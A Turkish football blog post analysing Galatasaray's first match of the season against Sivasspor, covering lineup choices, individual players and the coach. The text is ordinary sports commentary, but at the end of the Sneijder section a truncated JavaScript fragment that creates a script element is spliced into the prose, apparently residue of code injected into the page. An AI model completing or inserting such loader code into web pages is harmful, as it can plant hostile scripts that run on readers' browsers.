Galatasaray’ın İlk Hafta İzlenimleri

aa_picture_20150808_6018370_high-2

Galatasaray, Sivasspor’a karşı sezonun ilk karşılaşmasında yerine oturması gereken bir çok taş olduğu izlenimini verdiği bir maç oynadı. Görünen o ki takımlar yeni sezona tam anlamıyla hazır değil. Fakat bu maçta Hamza Hamzaoğlu ve tercihleri beklentilerden uzak bir futbol oynanmasına yol açtı denebilir.

Galatasaray İlk 11’i

lineup

Oyuncu Tercihleri

Sezon öncesi öngörüldüğü gibi 4-2-3-1 sistemini tercih eden Hamza Hamzaoğlu, sol önde hiç hazır olmayan bir Olcan Adın ve santrfor pozisyonunda ilk yarıda iyi bir performans sergileyemeyen Podolski’yi tercih etti. İkinci yarıda Burak’ın dahil olmasıyla birlikte biraz daha iyi görünen Podolski henüz yüzde yüz hazır ve takıma adapte olabilmiş değil.

fft104mm3789239

Orta alanda Selçuk’un partneri Bilal’di ve Melo’nun eksikliğinin çok net olarak hissedildiğini gördük. Toplu oyunda iyi bir pasör olarak nitelendirebileceğimiz Bilal, topun arkasındayken rakip akınlarını kesmede ve hamlelerde sıkıntı yaşıyor. Bu pozisyona Melo’nun geleceğini düşünürsek birlikte beşinci sezonunu oynayacak olan Selçuk – Melo ikilisi, Galatasaray’ın orta sahadaki ideal ikilisi olacak ve takıma önceki senelerdeki gibi iyi katkı vermelerini bekliyorum.

Defans dörtlüsüne baktığımızda solda oldukça diri görünen, hücumda da etkin ve yaptığı asistle dikkat çeken bir Alex Telles izledik. Kondisyon açısından problem yaşamadığı ve devamlılığı yakaladığı takdirde takımına çok faydalı bir oyuncu olacak. Stoperde Hakan ve Chedjou bu maç özelinde konsantrasyon ve koordinasyon açısından iyi bir performans sergiledi ama savunmanın sağındaki Sabri Sarıoğlu için aynı şeyleri söylemek maalesef imkansız. Artık günümüz futbolunda bek oyuncularından sadece savunma özelliklerinin iyi olması beklenemez ve beklerin hücumdaki etkinliği takımın hücum varyasyonlarındaki zenginliği için çok önemli ama Sabri 8 başarısız orta ile hücumda inanılmaz etkisiz olmasının yanı sıra defansif anlamda da problem yaşadı. Kalede Fernando Muslera inanılmaz bir hata yaparak takımının geri düşmesine sebep oldu fakat yine de takımın en güven veren ismi ve sezonun geri kalan kısmında bu tür hatalar yapmayacaktır.

Burak Yılmaz faktörü

Hamza hoca maçtan önce yaptığı açıklamada takım savunması anlamında daha etkili olmak için Burağı tercih etmediğini söyledi ama yine ve yine gördük ki Burak Yılmaz’sız bir Galatasaray her zaman gol yollarında ciddi problemler yaşayacak. Burak’ın sahada olması demek daha iyi bir Sneijder, daha iyi bir Selçuk, daha iyi bir Podolski, daha iyi bir Yasin ve hatta daha iyi bir Bilal demek. Burak artık eskisi gibi sadece rakip savunma arkasına koşular yaparak gol arayan bir oyuncu değil aynı zamanda geriden aldığı topları dağıtarak rakibin dengesini bozacak hamleler yapabilen bir oyuncu. Onun yokluğunda ilk yarıda vasatın altında bir performans sergileyen Cim Bom ikinci yarıda Burak’ın oyuna girişiyle birlikte hücumda daha etkin bir futbol sergiledi ve bunun sonucunda bulduğu gollerle beraberliği kurtardı.

Chedjou mucizesi

chedj

Takımın en iyisiydi. Hızı,konsantrasyonu, yerinde hamleleri, pozisyon takibi ve kendinden emin görüntüsüyle lige tam anlamıyla hazır olduğunu gösterdi. Felipe Melo’nun da takıma katılmasıyla birlikte takıma katkısının çok daha artacağını düşünüyorum. Bu sezona damgasını vurabilir.

Hamza Hamzaoğlu

Geçen sezon Prandelli’den miras aldığı kaotik ve problemli bir ekibe adeta ilaç gibi gelen ve sorunları teker teker çözen Hamza Hamzaoğlu, şampiyonluk yolunda emin adımlarla yürümüş ve kupaya uzanmıştı. O dönemde kimsenin tabii ki transfer gibi bir beklentisi yoktu ve tüm camia,taraftar dördüncü yıldıza odaklanmıştı. Hamza hoca 3 kupayla tüm beklentileri karşıladı ve yeni sezona şampiyon takımın hocası olarak girdi ama açıklamalarıyla ve olaylara yaklaşımıyla hep tartışıldı. Ben de maç öncesi ve maç sonrası Burak hakkında yaptığı açıklamaları talihsiz bulduğumu söylemeliyim. Takım savunmasını daha iyi yapmak için Burak’ın on birde olmadığını söyledi ama görüldüğü üzere Buraksız Galatasaray savunmada da hücumda da oldukça etkisiz bir performans sergiledi. Santrforda Burak yerine Podolski’nin kullanılması ve sol önde henüz hazır görüntüsü vermeyen Olcan’ın tercih edilmesi bu maçın kaderini çizmiş oldu. Bunun dışında, Sabri Sarıoğlu ısrarını anlamış değilim. Sabri Sarıoğlu artık Galatasaray’ın bu mevkiideki ilk tercihi olmamalı.

Wesley Sneijder

Süper Kupa karşılaşmasında Bursaspor’a karşı iyi bir performans sergileyememişti ve Sivasspor maçında da bu değişmedi. Fiziksel anlamda tam hazır değil görüntüsü veriyor bunun yanı sıra mental olarak da pek adapte ve konsantre gözükmüyor. Bunun tabii ki çeşitli sebepleri olabilir fakat hala yenilenmeyen sözleşmesi bunun en büyük nedeni gibi. Takımdan ayrılmak isteyen Melo’nun kontratı bile yenilenirken Sneijder hala beklemede. Bu da oyuncuyu ister istemez etkiler. Yönetimin bu konuda atacağı adımlar Sneijder’in performansına direkt olarak etki eder.var d=document;var s=d.createElement(‘script’);

adet yorum. Siz de yorumunuzu aşağı yazabilirsiniz.

Yazar: Futbol Akademi

info@futbolakademi.net

Paylaş